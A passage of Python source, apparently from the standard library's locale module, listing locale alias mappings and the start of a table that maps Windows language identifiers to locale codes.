'he_il.microsoftcp1255': 'he_IL.CP1255', 'hebrew': 'iw_IL.ISO8859-8', 'hebrew.iso88598': 'iw_IL.ISO8859-8', 'hi': 'hi_IN.ISCII-DEV', 'hi_in': 'hi_IN.ISCII-DEV', 'hi_in.isciidev': 'hi_IN.ISCII-DEV', 'hne': 'hne_IN.UTF-8', 'hr': 'hr_HR.ISO8859-2', 'hr_hr': 'hr_HR.ISO8859-2', 'hr_hr.iso88592': 'hr_HR.ISO8859-2', 'hrvatski': 'hr_HR.ISO8859-2', 'hu': 'hu_HU.ISO8859-2', 'hu_hu': 'hu_HU.ISO8859-2', 'hu_hu.iso88592': 'hu_HU.ISO8859-2', 'hungarian': 'hu_HU.ISO8859-2', 'icelandic': 'is_IS.ISO8859-1', 'icelandic.iso88591': 'is_IS.ISO8859-1', 'id': 'id_ID.ISO8859-1', 'id_id': 'id_ID.ISO8859-1', 'in': 'id_ID.ISO8859-1', 'in_id': 'id_ID.ISO8859-1', 'is': 'is_IS.ISO8859-1', 'is_is': 'is_IS.ISO8859-1', 'is_is.iso88591': 'is_IS.ISO8859-1', 'is_is.iso885915': 'is_IS.ISO8859-15', 'is_is@euro': 'is_IS.ISO8859-15', 'iso-8859-1': 'en_US.ISO8859-1', 'iso-8859-15': 'en_US.ISO8859-15', 'iso8859-1': 'en_US.ISO8859-1', 'iso8859-15': 'en_US.ISO8859-15', 'iso_8859_1': 
'en_US.ISO8859-1', 'iso_8859_15': 'en_US.ISO8859-15', 'it': 'it_IT.ISO8859-1', 'it.iso885915': 'it_IT.ISO8859-15', 'it_ch': 'it_CH.ISO8859-1', 'it_ch.iso88591': 'it_CH.ISO8859-1', 'it_ch.iso885915': 'it_CH.ISO8859-15', 'it_ch@euro': 'it_CH.ISO8859-15', 'it_it': 'it_IT.ISO8859-1', 'it_it.88591': 'it_IT.ISO8859-1', 'it_it.iso88591': 'it_IT.ISO8859-1', 'it_it.iso885915': 'it_IT.ISO8859-15', 'it_it.iso885915@euro': 'it_IT.ISO8859-15', 'it_it.utf8@euro': 'it_IT.UTF-8', 'it_it@euro': 'it_IT.ISO8859-15', 'italian': 'it_IT.ISO8859-1', 'italian.iso88591': 'it_IT.ISO8859-1', 'iu': 'iu_CA.NUNACOM-8', 'iu_ca': 'iu_CA.NUNACOM-8', 'iu_ca.nunacom8': 'iu_CA.NUNACOM-8', 'iw': 'he_IL.ISO8859-8', 'iw_il': 'he_IL.ISO8859-8', 'iw_il.iso88598': 'he_IL.ISO8859-8', 'ja': 'ja_JP.eucJP', 'ja.jis': 'ja_JP.JIS7', 'ja.sjis': 'ja_JP.SJIS', 'ja_jp': 'ja_JP.eucJP', 'ja_jp.ajec': 'ja_JP.eucJP', 'ja_jp.euc': 'ja_JP.eucJP', 'ja_jp.eucjp': 'ja_JP.eucJP', 'ja_jp.iso-2022-jp': 'ja_JP.JIS7', 'ja_jp.iso2022jp': 'ja_JP.JIS7', 'ja_jp.jis': 'ja_JP.JIS7', 'ja_jp.jis7': 'ja_JP.JIS7', 'ja_jp.mscode': 'ja_JP.SJIS', 'ja_jp.pck': 'ja_JP.SJIS', 'ja_jp.sjis': 'ja_JP.SJIS', 'ja_jp.ujis': 'ja_JP.eucJP', 'japan': 'ja_JP.eucJP', 'japanese': 'ja_JP.eucJP', 'japanese-euc': 'ja_JP.eucJP', 'japanese.euc': 'ja_JP.eucJP', 'japanese.sjis': 'ja_JP.SJIS', 'jp_jp': 'ja_JP.eucJP', 'ka': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge.georgianacademy': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge.georgianps': 'ka_GE.GEORGIAN-PS', 'ka_ge.georgianrs': 'ka_GE.GEORGIAN-ACADEMY', 'kl': 'kl_GL.ISO8859-1', 'kl_gl': 'kl_GL.ISO8859-1', 'kl_gl.iso88591': 'kl_GL.ISO8859-1', 'kl_gl.iso885915': 'kl_GL.ISO8859-15', 'kl_gl@euro': 'kl_GL.ISO8859-15', 'km_kh': 'km_KH.UTF-8', 'kn': 'kn_IN.UTF-8', 'kn_in': 'kn_IN.UTF-8', 'ko': 'ko_KR.eucKR', 'ko_kr': 'ko_KR.eucKR', 'ko_kr.euc': 'ko_KR.eucKR', 'ko_kr.euckr': 'ko_KR.eucKR', 'korean': 'ko_KR.eucKR', 'korean.euc': 'ko_KR.eucKR', 'ks': 'ks_IN.UTF-8', 'ks_in@devanagari': 'ks_IN@devanagari.UTF-8', 
'kw': 'kw_GB.ISO8859-1', 'kw_gb': 'kw_GB.ISO8859-1', 'kw_gb.iso88591': 'kw_GB.ISO8859-1', 'kw_gb.iso885914': 'kw_GB.ISO8859-14', 'kw_gb.iso885915': 'kw_GB.ISO8859-15', 'kw_gb@euro': 'kw_GB.ISO8859-15', 'ky': 'ky_KG.UTF-8', 'ky_kg': 'ky_KG.UTF-8', 'lithuanian': 'lt_LT.ISO8859-13', 'lo': 'lo_LA.MULELAO-1', 'lo_la': 'lo_LA.MULELAO-1', 'lo_la.cp1133': 'lo_LA.IBM-CP1133', 'lo_la.ibmcp1133': 'lo_LA.IBM-CP1133', 'lo_la.mulelao1': 'lo_LA.MULELAO-1', 'lt': 'lt_LT.ISO8859-13', 'lt_lt': 'lt_LT.ISO8859-13', 'lt_lt.iso885913': 'lt_LT.ISO8859-13', 'lt_lt.iso88594': 'lt_LT.ISO8859-4', 'lv': 'lv_LV.ISO8859-13', 'lv_lv': 'lv_LV.ISO8859-13', 'lv_lv.iso885913': 'lv_LV.ISO8859-13', 'lv_lv.iso88594': 'lv_LV.ISO8859-4', 'mai': 'mai_IN.UTF-8', 'mi': 'mi_NZ.ISO8859-1', 'mi_nz': 'mi_NZ.ISO8859-1', 'mi_nz.iso88591': 'mi_NZ.ISO8859-1', 'mk': 'mk_MK.ISO8859-5', 'mk_mk': 'mk_MK.ISO8859-5', 'mk_mk.cp1251': 'mk_MK.CP1251', 'mk_mk.iso88595': 'mk_MK.ISO8859-5', 'mk_mk.microsoftcp1251': 'mk_MK.CP1251', 'ml': 'ml_IN.UTF-8', 'mr': 'mr_IN.UTF-8', 'mr_in': 'mr_IN.UTF-8', 'ms': 'ms_MY.ISO8859-1', 'ms_my': 'ms_MY.ISO8859-1', 'ms_my.iso88591': 'ms_MY.ISO8859-1', 'mt': 'mt_MT.ISO8859-3', 'mt_mt': 'mt_MT.ISO8859-3', 'mt_mt.iso88593': 'mt_MT.ISO8859-3', 'nb': 'nb_NO.ISO8859-1', 'nb_no': 'nb_NO.ISO8859-1', 'nb_no.88591': 'nb_NO.ISO8859-1', 'nb_no.iso88591': 'nb_NO.ISO8859-1', 'nb_no.iso885915': 'nb_NO.ISO8859-15', 'nb_no@euro': 'nb_NO.ISO8859-15', 'nl': 'nl_NL.ISO8859-1', 'nl.iso885915': 'nl_NL.ISO8859-15', 'nl_be': 'nl_BE.ISO8859-1', 'nl_be.88591': 'nl_BE.ISO8859-1', 'nl_be.iso88591': 'nl_BE.ISO8859-1', 'nl_be.iso885915': 'nl_BE.ISO8859-15', 'nl_be.iso885915@euro': 'nl_BE.ISO8859-15', 'nl_be.utf8@euro': 'nl_BE.UTF-8', 'nl_be@euro': 'nl_BE.ISO8859-15', 'nl_nl': 'nl_NL.ISO8859-1', 'nl_nl.88591': 'nl_NL.ISO8859-1', 'nl_nl.iso88591': 'nl_NL.ISO8859-1', 'nl_nl.iso885915': 'nl_NL.ISO8859-15', 'nl_nl.iso885915@euro': 'nl_NL.ISO8859-15', 'nl_nl.utf8@euro': 'nl_NL.UTF-8', 'nl_nl@euro': 'nl_NL.ISO8859-15', 'nn': 
'nn_NO.ISO8859-1', 'nn_no': 'nn_NO.ISO8859-1', 'nn_no.88591': 'nn_NO.ISO8859-1', 'nn_no.iso88591': 'nn_NO.ISO8859-1', 'nn_no.iso885915': 'nn_NO.ISO8859-15', 'nn_no@euro': 'nn_NO.ISO8859-15', 'no': 'no_NO.ISO8859-1', 'no@nynorsk': 'ny_NO.ISO8859-1', 'no_no': 'no_NO.ISO8859-1', 'no_no.88591': 'no_NO.ISO8859-1', 'no_no.iso88591': 'no_NO.ISO8859-1', 'no_no.iso885915': 'no_NO.ISO8859-15', 'no_no.iso88591@bokmal': 'no_NO.ISO8859-1', 'no_no.iso88591@nynorsk': 'no_NO.ISO8859-1', 'no_no@euro': 'no_NO.ISO8859-15', 'norwegian': 'no_NO.ISO8859-1', 'norwegian.iso88591': 'no_NO.ISO8859-1', 'nr': 'nr_ZA.ISO8859-1', 'nr_za': 'nr_ZA.ISO8859-1', 'nr_za.iso88591': 'nr_ZA.ISO8859-1', 'nso': 'nso_ZA.ISO8859-15', 'nso_za': 'nso_ZA.ISO8859-15', 'nso_za.iso885915': 'nso_ZA.ISO8859-15', 'ny': 'ny_NO.ISO8859-1', 'ny_no': 'ny_NO.ISO8859-1', 'ny_no.88591': 'ny_NO.ISO8859-1', 'ny_no.iso88591': 'ny_NO.ISO8859-1', 'ny_no.iso885915': 'ny_NO.ISO8859-15', 'ny_no@euro': 'ny_NO.ISO8859-15', 'nynorsk': 'nn_NO.ISO8859-1', 'oc': 'oc_FR.ISO8859-1', 'oc_fr': 'oc_FR.ISO8859-1', 'oc_fr.iso88591': 'oc_FR.ISO8859-1', 'oc_fr.iso885915': 'oc_FR.ISO8859-15', 'oc_fr@euro': 'oc_FR.ISO8859-15', 'or': 'or_IN.UTF-8', 'pa': 'pa_IN.UTF-8', 'pa_in': 'pa_IN.UTF-8', 'pd': 'pd_US.ISO8859-1', 'pd_de': 'pd_DE.ISO8859-1', 'pd_de.iso88591': 'pd_DE.ISO8859-1', 'pd_de.iso885915': 'pd_DE.ISO8859-15', 'pd_de@euro': 'pd_DE.ISO8859-15', 'pd_us': 'pd_US.ISO8859-1', 'pd_us.iso88591': 'pd_US.ISO8859-1', 'pd_us.iso885915': 'pd_US.ISO8859-15', 'pd_us@euro': 'pd_US.ISO8859-15', 'ph': 'ph_PH.ISO8859-1', 'ph_ph': 'ph_PH.ISO8859-1', 'ph_ph.iso88591': 'ph_PH.ISO8859-1', 'pl': 'pl_PL.ISO8859-2', 'pl_pl': 'pl_PL.ISO8859-2', 'pl_pl.iso88592': 'pl_PL.ISO8859-2', 'polish': 'pl_PL.ISO8859-2', 'portuguese': 'pt_PT.ISO8859-1', 'portuguese.iso88591': 'pt_PT.ISO8859-1', 'portuguese_brazil': 'pt_BR.ISO8859-1', 'portuguese_brazil.8859': 'pt_BR.ISO8859-1', 'posix': 'C', 'posix-utf2': 'C', 'pp': 'pp_AN.ISO8859-1', 'pp_an': 'pp_AN.ISO8859-1', 
'pp_an.iso88591': 'pp_AN.ISO8859-1', 'pt': 'pt_PT.ISO8859-1', 'pt.iso885915': 'pt_PT.ISO8859-15', 'pt_br': 'pt_BR.ISO8859-1', 'pt_br.88591': 'pt_BR.ISO8859-1', 'pt_br.iso88591': 'pt_BR.ISO8859-1', 'pt_br.iso885915': 'pt_BR.ISO8859-15', 'pt_br@euro': 'pt_BR.ISO8859-15', 'pt_pt': 'pt_PT.ISO8859-1', 'pt_pt.88591': 'pt_PT.ISO8859-1', 'pt_pt.iso88591': 'pt_PT.ISO8859-1', 'pt_pt.iso885915': 'pt_PT.ISO8859-15', 'pt_pt.iso885915@euro': 'pt_PT.ISO8859-15', 'pt_pt.utf8@euro': 'pt_PT.UTF-8', 'pt_pt@euro': 'pt_PT.ISO8859-15', 'ro': 'ro_RO.ISO8859-2', 'ro_ro': 'ro_RO.ISO8859-2', 'ro_ro.iso88592': 'ro_RO.ISO8859-2', 'romanian': 'ro_RO.ISO8859-2', 'ru': 'ru_RU.UTF-8', 'ru.koi8r': 'ru_RU.KOI8-R', 'ru_ru': 'ru_RU.UTF-8', 'ru_ru.cp1251': 'ru_RU.CP1251', 'ru_ru.iso88595': 'ru_RU.ISO8859-5', 'ru_ru.koi8r': 'ru_RU.KOI8-R', 'ru_ru.microsoftcp1251': 'ru_RU.CP1251', 'ru_ua': 'ru_UA.KOI8-U', 'ru_ua.cp1251': 'ru_UA.CP1251', 'ru_ua.koi8u': 'ru_UA.KOI8-U', 'ru_ua.microsoftcp1251': 'ru_UA.CP1251', 'rumanian': 'ro_RO.ISO8859-2', 'russian': 'ru_RU.ISO8859-5', 'rw': 'rw_RW.ISO8859-1', 'rw_rw': 'rw_RW.ISO8859-1', 'rw_rw.iso88591': 'rw_RW.ISO8859-1', 'sd': 'sd_IN@devanagari.UTF-8', 'se_no': 'se_NO.UTF-8', 'serbocroatian': 'sr_RS.UTF-8@latin', 'sh': 'sr_RS.UTF-8@latin', 'sh_ba.iso88592@bosnia': 'sr_CS.ISO8859-2', 'sh_hr': 'sh_HR.ISO8859-2', 'sh_hr.iso88592': 'hr_HR.ISO8859-2', 'sh_sp': 'sr_CS.ISO8859-2', 'sh_yu': 'sr_RS.UTF-8@latin', 'si': 'si_LK.UTF-8', 'si_lk': 'si_LK.UTF-8', 'sinhala': 'si_LK.UTF-8', 'sk': 'sk_SK.ISO8859-2', 'sk_sk': 'sk_SK.ISO8859-2', 'sk_sk.iso88592': 'sk_SK.ISO8859-2', 'sl': 'sl_SI.ISO8859-2', 'sl_cs': 'sl_CS.ISO8859-2', 'sl_si': 'sl_SI.ISO8859-2', 'sl_si.iso88592': 'sl_SI.ISO8859-2', 'slovak': 'sk_SK.ISO8859-2', 'slovene': 'sl_SI.ISO8859-2', 'slovenian': 'sl_SI.ISO8859-2', 'sp': 'sr_CS.ISO8859-5', 'sp_yu': 'sr_CS.ISO8859-5', 'spanish': 'es_ES.ISO8859-1', 'spanish.iso88591': 'es_ES.ISO8859-1', 'spanish_spain': 'es_ES.ISO8859-1', 'spanish_spain.8859': 'es_ES.ISO8859-1', 'sq': 
'sq_AL.ISO8859-2', 'sq_al': 'sq_AL.ISO8859-2', 'sq_al.iso88592': 'sq_AL.ISO8859-2', 'sr': 'sr_RS.UTF-8', 'sr@cyrillic': 'sr_RS.UTF-8', 'sr@latin': 'sr_RS.UTF-8@latin', 'sr@latn': 'sr_RS.UTF-8@latin', 'sr_cs': 'sr_RS.UTF-8', 'sr_cs.iso88592': 'sr_CS.ISO8859-2', 'sr_cs.iso88592@latn': 'sr_CS.ISO8859-2', 'sr_cs.iso88595': 'sr_CS.ISO8859-5', 'sr_cs.utf8@latn': 'sr_RS.UTF-8@latin', 'sr_cs@latn': 'sr_RS.UTF-8@latin', 'sr_me': 'sr_ME.UTF-8', 'sr_rs': 'sr_RS.UTF-8', 'sr_rs.utf8@latn': 'sr_RS.UTF-8@latin', 'sr_rs@latin': 'sr_RS.UTF-8@latin', 'sr_rs@latn': 'sr_RS.UTF-8@latin', 'sr_sp': 'sr_CS.ISO8859-2', 'sr_yu': 'sr_RS.UTF-8@latin', 'sr_yu.cp1251@cyrillic': 'sr_CS.CP1251', 'sr_yu.iso88592': 'sr_CS.ISO8859-2', 'sr_yu.iso88595': 'sr_CS.ISO8859-5', 'sr_yu.iso88595@cyrillic': 'sr_CS.ISO8859-5', 'sr_yu.microsoftcp1251@cyrillic': 'sr_CS.CP1251', 'sr_yu.utf8@cyrillic': 'sr_RS.UTF-8', 'sr_yu@cyrillic': 'sr_RS.UTF-8', 'ss': 'ss_ZA.ISO8859-1', 'ss_za': 'ss_ZA.ISO8859-1', 'ss_za.iso88591': 'ss_ZA.ISO8859-1', 'st': 'st_ZA.ISO8859-1', 'st_za': 'st_ZA.ISO8859-1', 'st_za.iso88591': 'st_ZA.ISO8859-1', 'sv': 'sv_SE.ISO8859-1', 'sv.iso885915': 'sv_SE.ISO8859-15', 'sv_fi': 'sv_FI.ISO8859-1', 'sv_fi.iso88591': 'sv_FI.ISO8859-1', 'sv_fi.iso885915': 'sv_FI.ISO8859-15', 'sv_fi.iso885915@euro': 'sv_FI.ISO8859-15', 'sv_fi.utf8@euro': 'sv_FI.UTF-8', 'sv_fi@euro': 'sv_FI.ISO8859-15', 'sv_se': 'sv_SE.ISO8859-1', 'sv_se.88591': 'sv_SE.ISO8859-1', 'sv_se.iso88591': 'sv_SE.ISO8859-1', 'sv_se.iso885915': 'sv_SE.ISO8859-15', 'sv_se@euro': 'sv_SE.ISO8859-15', 'swedish': 'sv_SE.ISO8859-1', 'swedish.iso88591': 'sv_SE.ISO8859-1', 'ta': 'ta_IN.TSCII-0', 'ta_in': 'ta_IN.TSCII-0', 'ta_in.tscii': 'ta_IN.TSCII-0', 'ta_in.tscii0': 'ta_IN.TSCII-0', 'te': 'te_IN.UTF-8', 'tg': 'tg_TJ.KOI8-C', 'tg_tj': 'tg_TJ.KOI8-C', 'tg_tj.koi8c': 'tg_TJ.KOI8-C', 'th': 'th_TH.ISO8859-11', 'th_th': 'th_TH.ISO8859-11', 'th_th.iso885911': 'th_TH.ISO8859-11', 'th_th.tactis': 'th_TH.TIS620', 'th_th.tis620': 'th_TH.TIS620', 'thai': 
'th_TH.ISO8859-11', 'tl': 'tl_PH.ISO8859-1', 'tl_ph': 'tl_PH.ISO8859-1', 'tl_ph.iso88591': 'tl_PH.ISO8859-1', 'tn': 'tn_ZA.ISO8859-15', 'tn_za': 'tn_ZA.ISO8859-15', 'tn_za.iso885915': 'tn_ZA.ISO8859-15', 'tr': 'tr_TR.ISO8859-9', 'tr_tr': 'tr_TR.ISO8859-9', 'tr_tr.iso88599': 'tr_TR.ISO8859-9', 'ts': 'ts_ZA.ISO8859-1', 'ts_za': 'ts_ZA.ISO8859-1', 'ts_za.iso88591': 'ts_ZA.ISO8859-1', 'tt': 'tt_RU.TATAR-CYR', 'tt_ru': 'tt_RU.TATAR-CYR', 'tt_ru.koi8c': 'tt_RU.KOI8-C', 'tt_ru.tatarcyr': 'tt_RU.TATAR-CYR', 'turkish': 'tr_TR.ISO8859-9', 'turkish.iso88599': 'tr_TR.ISO8859-9', 'uk': 'uk_UA.KOI8-U', 'uk_ua': 'uk_UA.KOI8-U', 'uk_ua.cp1251': 'uk_UA.CP1251', 'uk_ua.iso88595': 'uk_UA.ISO8859-5', 'uk_ua.koi8u': 'uk_UA.KOI8-U', 'uk_ua.microsoftcp1251': 'uk_UA.CP1251', 'univ': 'en_US.utf', 'universal': 'en_US.utf', 'universal.utf8@ucs4': 'en_US.UTF-8', 'ur': 'ur_PK.CP1256', 'ur_pk': 'ur_PK.CP1256', 'ur_pk.cp1256': 'ur_PK.CP1256', 'ur_pk.microsoftcp1256': 'ur_PK.CP1256', 'uz': 'uz_UZ.UTF-8', 'uz_uz': 'uz_UZ.UTF-8', 'uz_uz.iso88591': 'uz_UZ.ISO8859-1', 'uz_uz.utf8@cyrillic': 'uz_UZ.UTF-8', 'uz_uz@cyrillic': 'uz_UZ.UTF-8', 've': 've_ZA.UTF-8', 've_za': 've_ZA.UTF-8', 'vi': 'vi_VN.TCVN', 'vi_vn': 'vi_VN.TCVN', 'vi_vn.tcvn': 'vi_VN.TCVN', 'vi_vn.tcvn5712': 'vi_VN.TCVN', 'vi_vn.viscii': 'vi_VN.VISCII', 'vi_vn.viscii111': 'vi_VN.VISCII', 'wa': 'wa_BE.ISO8859-1', 'wa_be': 'wa_BE.ISO8859-1', 'wa_be.iso88591': 'wa_BE.ISO8859-1', 'wa_be.iso885915': 'wa_BE.ISO8859-15', 'wa_be.iso885915@euro': 'wa_BE.ISO8859-15', 'wa_be@euro': 'wa_BE.ISO8859-15', 'xh': 'xh_ZA.ISO8859-1', 'xh_za': 'xh_ZA.ISO8859-1', 'xh_za.iso88591': 'xh_ZA.ISO8859-1', 'yi': 'yi_US.CP1255', 'yi_us': 'yi_US.CP1255', 'yi_us.cp1255': 'yi_US.CP1255', 'yi_us.microsoftcp1255': 'yi_US.CP1255', 'zh': 'zh_CN.eucCN', 'zh_cn': 'zh_CN.gb2312', 'zh_cn.big5': 'zh_TW.big5', 'zh_cn.euc': 'zh_CN.eucCN', 'zh_cn.gb18030': 'zh_CN.gb18030', 'zh_cn.gb2312': 'zh_CN.gb2312', 'zh_cn.gbk': 'zh_CN.gbk', 'zh_hk': 'zh_HK.big5hkscs', 'zh_hk.big5': 
'zh_HK.big5', 'zh_hk.big5hk': 'zh_HK.big5hkscs', 'zh_hk.big5hkscs': 'zh_HK.big5hkscs', 'zh_tw': 'zh_TW.big5', 'zh_tw.big5': 'zh_TW.big5', 'zh_tw.euc': 'zh_TW.eucTW', 'zh_tw.euctw': 'zh_TW.eucTW', 'zu': 'zu_ZA.ISO8859-1', 'zu_za': 'zu_ZA.ISO8859-1', 'zu_za.iso88591': 'zu_ZA.ISO8859-1', } # # This maps Windows language identifiers to locale strings. # # This list has been updated from # http://msdn.microsoft.com/library/default.asp?url=/library/en-us/intl/nls_238z.asp # to include every locale up to Windows Vista. # # NOTE: this mapping is incomplete. If your language is missing, please # submit a bug report to Python bug manager, which you can find via: # http://www.python.org/dev/ # Make sure you include the missing language identifier and the suggested # locale code. # windows_locale = { 0x0436: "af_ZA", # Afrikaans 0x041c: "sq_AL", # Albanian 0x0484: "gsw_FR",# Alsatian - France 0x045e: "am_ET", # Amharic - Ethiopia 0x0401: "ar_SA", # Arabic - Saudi Arabia 0x0801: "ar_IQ", # Arabic - Iraq 0x0c01: "ar_EG", # Arabic - Egypt 0x1001: "ar_LY", # Arabic - Libya 0x1401: "ar_DZ", # Arabic - Algeria 0x1801: "ar_MA", # Arabic - Morocco 0x1c01: "ar_TN", # Arabic - Tunisia 0x2001: "ar_OM", # Arabic - Oman 0x2401: "ar_YE", # Arabic - Yemen 0x2801: "ar_SY", # Arabic - Syria 0x2c01: "ar_JO", # Arabic - Jordan 0x3001: "ar_LB", # Arabic - Lebanon 0x3401: "ar_KW", # Arabic - Kuwait 0x3801: "ar_AE", # Arabic - United Arab Emirates 0x3c01: "ar_BH", # Arabic - Bahrain 0x4001: "ar_QA", # Arabic - Qatar 0x042b: "hy_AM", # Armenian 0x044d: "as_IN", # Assamese - India 0x042c: "az_AZ", # Azeri - Latin 0x082c: "az_AZ", # Azeri - Cyrillic 0x046d: "ba_RU", # Bashkir 0x042d: "eu_ES", # Basque - Russia 0x0423: "be_BY", # Belarusian 0x0445: "bn_IN", # Begali 0x201a: "bs_BA", # Bosnian - Cyrillic 0x141a: "bs_BA", # Bosnian - Latin 0x047e: "br_FR", # Breton - France 0x0402: "bg_BG", # Bulgarian # 0x0455: "my_MM", # Burmese - Not supported 0x0403: "ca_ES", # Catalan 0x0004: "zh_CHS",# Chinese - 
Simplified 0x0404: "zh_TW", # Chinese - Taiwan 0x0804: "zh_CN", # Chinese - PRC 0x0c04: "zh_HK", # Chinese - Hong Kong S.A.R. 0x1004: "zh_SG", # Chinese - Singapore 0x1404: "zh_MO", # Chinese - Macao S.A.R. 0x7c04: "zh_CHT",# Chinese - Traditional 0x0483: "co_FR", # Corsican - France 0x041a: "hr_HR", # Croatian 0x101a: "hr_BA", # Croatian - Bosnia 0x0405: "cs_CZ", # Czech 0x0406: "da_DK", # Danish 0x048c: "gbz_AF",# Dari - Afghanistan 0x0465: "div_MV",# Divehi - Maldives 0x0413: "nl_NL", # Dutch - The Netherlands 0x0813: "nl_BE", # Dutch - Belgium 0x0409: "en_US", # English - United States 0x0809: "en_GB", # English - United Kingdom 0x0c09: "en_AU", # English - Australia 0x1009: "en_CA", # English - Canada 0x1409: "en_NZ", # English - New Zealand 0x1809: "en_IE", # English - Ireland 0x1c09: "en_ZA", # English - South Africa 0x2009: "en_JA", # English - Jamaica 0x2409: "en_CB", # English - Carribbean 0x2809: "en_BZ", # English - Belize 0x2c09: "en_TT", # English - Trinidad 0x3009: "en_ZW", # English - Zimbabwe 0x3409: "en_PH", # English - Philippines 0x4009: "en_IN", # English - India 0x4409: "en_MY", # English - Malaysia 0x4809: "en_IN", # English - Singapore 0x0425: "et_EE", # Estonian 0x0438: "fo_FO", # Faroese 0x0464: "fil_PH",# Filipino 0x040b: "fi_FI", # Finnish 0x040c: "fr_FR", # French - France 0x080c: "fr_BE", # French - Belgium 0x0c0c: "fr_CA", # French - Canada 0x100c: "fr_CH", # French - Switzerland 0x140c: "fr_LU", # French - Luxembourg 0x180c: "fr_MC", # French - Monaco 0x0462: "fy_NL", # Frisian - Netherlands 0x0456: "gl_ES", # Galician 0x0437: "ka_GE", # Georgian 0x0407: "de_DE", # German - Germany 0x0807: "de_CH", # German - Switzerland 0x0c07: "de_AT", # German - Austria 0x1007: "de_LU", # German - Luxembourg 0x1407: "de_LI", # German - Liechtenstein 0x0408: "el_GR", # Greek 0x046f: "kl_GL", # Greenlandic - Greenland 0x0447: "gu_IN", # Gujarati 0x0468: "ha_NG", # Hausa - Latin 0x040d: "he_IL", # Hebrew 0x0439: "hi_IN", # Hindi 0x040e: "hu_HU", # 
Hungarian 0x040f: "is_IS", # Icelandic 0x0421: "id_ID", # Indonesian 0x045d: "iu_CA", # Inuktitut - Syllabics 0x085d: "iu_CA", # Inuktitut - Latin 0x083c: "ga_IE", # Irish - Ireland 0x0410: "it_IT", # Italian - Italy 0x0810: "it_CH", # Italian - Switzerland 0x0411: "ja_JP", # Japanese 0x044b: "kn_IN", # Kannada - India 0x043f: "kk_KZ", # Kazakh 0x0453: "kh_KH", # Khmer - Cambodia 0x0486: "qut_GT",# K'iche - Guatemala 0x0487: "rw_RW", # Kinyarwanda - Rwanda 0x0457: "kok_IN",# Konkani 0x0412: "ko_KR", # Korean 0x0440: "ky_KG", # Kyrgyz 0x0454: "lo_LA", # Lao - Lao PDR 0x0426: "lv_LV", # Latvian 0x0427: "lt_LT", # Lithuanian 0x082e: "dsb_DE",# Lower Sorbian - Germany 0x046e: "lb_LU", # Luxembourgish 0x042f: "mk_MK", # FYROM Macedonian 0x043e: "ms_MY", # Malay - Malaysia 0x083e: "ms_BN", # Malay - Brunei Darussalam 0x044c: "ml_IN", # Malayalam - India 0x043a: "mt_MT", # Maltese 0x0481: "mi_NZ", # Maori 0x047a: "arn_CL",# Mapudungun 0x044e: "mr_IN", # Marathi 0x047c: "moh_CA",# Mohawk - Canada 0x0450: "mn_MN", # Mongolian - Cyrillic 0x0850: "mn_CN", # Mongolian - PRC 0x0461: "ne_NP", # Nepali 0x0414: "nb_NO", # Norwegian - Bokmal 0x0814: "nn_NO", # Norwegian - Nynorsk 0x0482: "oc_FR", # Occitan - France 0x0448: "or_IN", # Oriya - India 0x0463: "ps_AF", # Pashto - Afghanistan 0x0429: "fa_IR", # Persian 0x0415: "pl_PL", # Polish 0x0416: "pt_BR", # Portuguese - Brazil 0x0816: "pt_PT", # Portuguese - Portugal 0x0446: "pa_IN", # Punjabi 0x046b: "quz_BO",# Quechua (Bolivia) 0x086b: "quz_EC",# Quechua (Ecuador) 0x0c6b: "quz_PE",# Quechua (Peru) 0x0418: "ro_RO", # Romanian - Romania 0x0417: "rm_CH", # Romansh 0x0419: "ru_RU", # Russian 0x243b: "smn_FI",# Sami Finland 0x103b: "smj_NO",# Sami Norway 0x143b: "smj_SE",# Sami Sweden 0x043b: "se_NO", # Sami Northern Norway 0x083b: "se_SE", # Sami Northern Sweden 0x0c3b: "se_FI", # Sami Northern Finland 0x203b: "sms_FI",# Sami Skolt 0x183b: "sma_NO",# Sami Southern Norway 0x1c3b: "sma_SE",# Sami Southern Sweden 0x044f: "sa_IN", # 
Sanskrit 0x0c1a: "sr_SP", # Serbian - Cyrillic 0x1c1a: "sr_BA", # Serbian - Bosnia Cyrillic 0x081a: "sr_SP", # Serbian - Latin 0x181a: "sr_BA", # Serbian - Bosnia Latin 0x045b: "si_LK", # Sinhala - Sri Lanka 0x046c: "ns_ZA", # Northern Sotho 0x0432: "tn_ZA", # Setswana - Southern Africa 0x041b: "sk_SK", # Slovak 0x0424: "sl_SI", # Slovenian 0x040a: "es_ES", # Spanish - Spain 0x080a: "es_MX", # Spanish - Mexico 0x0c0a: "es_ES", # Spanish - Spain (Modern) 0x100a: "es_GT", # Spanish - Guatemala 0x140a: "es_CR", # Spanish - Costa Rica 0x180a: "es_PA", # Spanish - Panama 0x1c0a: "es_DO", # Spanish - Dominican Republic 0x200a: "es_VE", # Spanish - Venezuela 0x240a: "es_CO", # Spanish - Colombia 0x280a: "es_PE", # Spanish - Peru 0x2c0a: "es_AR", # Spanish - Argentina 0x300a: "es_EC", # Spanish - Ecuador 0x340a: "es_CL", # Spanish - Chile 0x380a: "es_UR", # Spanish - Uruguay 0x3c0a: "es_PY", # Spanish - Paraguay 0x400a: "es_BO", # Spanish - Bolivia 0x440a: "es_SV", # Spanish - El Salvador 0x480a: "es_HN", # Spanish - Honduras 0x4c0a: "es_NI", # Spanish - Nicaragua 0x500a: "es_PR", # Spanish - Puerto Rico 0x540a: "es_US", # Spanish - United States # 0x0430: "", # Sutu - Not supported 0x0441: "sw_KE", # Swahili 0x041d: "sv_SE", # Swedish - Sweden 0x081d: "sv_FI", # Swedish - Finland 0x045a: "syr_SY",# Syriac 0x0428: "tg_TJ", # Tajik - Cyrillic 0x085f: "tmz_DZ",# Tamazight - Latin 0x0449: "ta_IN", # Tamil 0x0444: "tt_RU", # Tatar 0x044a: "te_IN", # Telugu 0x041e: "th_TH", # Thai 0x0851: "bo_BT", # Tibetan - Bhutan 0x0451: "bo_CN", # Tibetan - PRC 0x041f: "tr_TR", # Turkish 0x0442: "tk_TM", # Turkmen - Cyrillic 0x0480: "ug_CN", # Uighur - Arabic 0x0422: "uk_UA", # Ukrainian 0x042e: "wen_DE",# Upper Sorbian - Germany 0x0420: "ur_PK", # Urdu 0x0820: "ur_IN", # Urdu - India 0x0443: "uz_UZ", # Uzbek - Latin 0x0843: "uz_UZ", # Uzbek - Cyrillic 0x042a: "vi_VN", # Vietnamese 0x0452: "cy_GB", # Welsh 0x0488: "wo_SN", # Wolof - Senegal 0x0434: 